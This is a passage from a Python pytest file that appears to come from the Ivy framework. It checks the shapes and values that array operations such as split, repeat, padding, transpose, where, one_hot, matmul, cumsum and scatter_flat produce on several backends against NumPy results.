axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# fourier_encode
# @pytest.mark.parametrize(
# "x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
# 3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
# ([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
# [[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
# -8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
# -6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
# 1.0000000e+00]],
# [[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
# -2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
# -1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
# 1.0000000e+00]],
# [[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
# -6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
# -3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
# 1.0000000e+00]]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# # smoke test
# x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# if isinstance(max_freq, list):
# max_freq = tensor_fn(max_freq, dtype, dev)
# ret = ivy.fourier_encode(x, max_freq, num_bands)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# x_shape = [1] if x.shape == () else list(x.shape)
# expected_shape = x_shape + [1 + 2*num_bands]
# assert list(ret.shape) == expected_shape
# # value test
# assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# expand_dims
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.expand_dims(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# expected_shape = list(x.shape)
# expected_shape.insert(axis, 1)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# squeeze
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.squeeze(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if axis is None:
# expected_shape = [item for item in x.shape if item != 1]
# elif x.shape == ():
# expected_shape = []
# else:
# expected_shape = list(x.shape)
# expected_shape.pop(axis)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# ones
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.ones(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# full
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "fill_val", [2., -7.])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.full(shape, fill_val, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
